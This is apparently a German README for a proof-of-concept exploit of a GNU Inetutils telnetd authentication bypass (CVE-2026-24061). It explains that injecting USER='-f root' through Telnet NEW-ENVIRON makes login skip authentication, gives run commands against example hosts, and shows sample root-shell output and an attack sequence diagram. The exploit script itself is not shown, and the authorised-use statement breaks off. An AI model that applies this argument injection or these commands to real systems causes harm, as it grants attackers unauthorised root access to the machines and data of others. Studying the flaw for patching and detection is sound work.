
Proof-of-Concept-Exploit für die Authentifizierungsumgehung von GNU Inetutils telnetd (CVE-2026-24061), der über eine manipulierte NEW-ENVIRON USER-Variable eine Root-Shell startet.
Dieses Repository enthält einen Proof‑of‑Concept‑Exploit für die Remote‑Authentifizierungsumgehungsschwachstelle in GNU Inetutils telnetd.
Das Problem entsteht, weil telnetd die über die Telnet‑NEW‑ENVIRON‑Aushandlung empfangene Umgebungsvariable USER vor dem Aufruf von /bin/login nicht ordnungsgemäß bereinigt.
Durch die Angabe von:
USER=-f root
führt telnetd effektiv Folgendes aus:
/bin/login -f root
was die Authentifizierung umgeht und eine sofortige Root‑Shell startet.
Telnet NEW‑ENVIRON erlaubt Clients, während der Sitzungsaushandlung Umgebungsvariablen zu setzen.
Das verwundbare telnetd übergibt USER direkt an login:
/bin/login -f "$USER"
Ein Angreifer setzt:
USER=-f root
Ergebnis:
/bin/login -f root
Das Flag -f weist login an, die Authentifizierung zu überspringen, wodurch Root‑Zugriff gewährt wird.
Keine externen Abhängigkeiten erforderlich.
python3 cve-2026-24061.py 192.168.1.100
python3 cve-2026-24061.py example.com 23
Wenn verwundbar:
# id
uid=0(root) gid=0(root)
#
Sie haben nun eine interaktive Root‑Shell.
python3 cve-2026-24061.py 10.10.10.20
Ausgabe:
[+] Connected to 10.10.10.20:23
[+] Sent malicious USER=-f root via NEW-ENVIRON
[+] Negotiation complete - entering interactive shell
#
sequenceDiagram
participant A as Angreifer
participant T as Ziel‑telnetd
participant L as /bin/login
participant R as Root‑Shell
A->>T: Verbindung TCP/23
A->>T: Telnet NEW-ENVIRON USER=-f root
T->>L: Ausführen /bin/login -f root
L-->>T: Auth‑Umgehung erfolgreich
T-->>R: Root‑Shell starten
R-->>A: Interaktive Root‑Sitzung
Dieser Exploit wird bereitgestellt für:
Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.